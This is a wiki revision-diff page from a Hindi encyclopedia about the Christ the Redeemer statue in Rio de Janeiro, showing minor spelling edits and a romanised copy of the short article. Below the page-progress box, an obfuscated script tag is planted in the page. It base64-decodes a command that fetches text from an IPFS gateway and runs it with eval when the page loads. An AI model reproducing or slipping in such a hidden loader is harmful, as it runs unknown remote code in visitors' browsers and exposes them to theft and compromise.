Difference between revisions of "क्राइस्ट द रिडीमर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "मजबूत" to "मज़बूत")
m (Text replacement - "अर्थात " to "अर्थात् ")
 
Line 1: Line 1:
 
[[चित्र:Christ-The-Redeemer.jpg|thumb|150px|क्राइस्ट द रिडीमर]]
 
[[चित्र:Christ-The-Redeemer.jpg|thumb|150px|क्राइस्ट द रिडीमर]]
 
'''क्राइस्ट द रिडीमर''' [[विश्व के सात आश्चर्य (आधुनिक)|आधुनिक विश्व के सात आश्चर्यों]] में से एक है।
 
'''क्राइस्ट द रिडीमर''' [[विश्व के सात आश्चर्य (आधुनिक)|आधुनिक विश्व के सात आश्चर्यों]] में से एक है।
*ब्राजील के रियो डि जनेरियो में पहाड़ी के ऊपर स्थित 130 फुट ऊँची 'क्राइस्ट द रिडीमर' अर्थात 'उद्धार करने वाले ईसा मसीह' की मूर्ति स्थित है।                 
+
*ब्राजील के रियो डि जनेरियो में पहाड़ी के ऊपर स्थित 130 फुट ऊँची 'क्राइस्ट द रिडीमर' अर्थात् 'उद्धार करने वाले ईसा मसीह' की मूर्ति स्थित है।                 
 
*यह क्रॉस या सलीब के आकार की है,<ref>जो [[ईसा मसीह]] का प्रतीक है</ref> कंक्रीट और पत्थर की बनी है और 1931 में बनकर तैयार हुई थी जब लोगों से मिले दान से इसे बनाया गया।  
 
*यह क्रॉस या सलीब के आकार की है,<ref>जो [[ईसा मसीह]] का प्रतीक है</ref> कंक्रीट और पत्थर की बनी है और 1931 में बनकर तैयार हुई थी जब लोगों से मिले दान से इसे बनाया गया।  
 
*यह विश्व में ईसा मसीह की सबसे बड़ी मूर्ति है।
 
*यह विश्व में ईसा मसीह की सबसे बड़ी मूर्ति है।

Latest revision as of 07:48, 7 November 2017

thumb|150px|kraist d ridimar kraist d ridimar adhunik vishv ke sat ashcharyoan mean se ek hai.

  • brajil ke riyo di janeriyo mean paha di ke oopar sthit 130 phut ooanchi 'kraist d ridimar' arthath 'uddhar karane vale eesa masih' ki moorti sthit hai.
  • yah kr aaus ya salib ke akar ki hai,[1] kankrit aur patthar ki bani hai aur 1931 mean banakar taiyar huee thi jab logoan se mile dan se ise banaya gaya.
  • yah vishv mean eesa masih ki sabase b di moorti hai.
  • yah duniya mean apani tarah ki sabase ooanchi moortiyoan mean se ek hai.
  • yah mazaboot kaankrit aur sopaston se bani hai, isaka nirman 1922 aur 1931 ke bich kiya gaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. jo eesa masih ka pratik hai

bahari k diyaan

sanbandhit lekh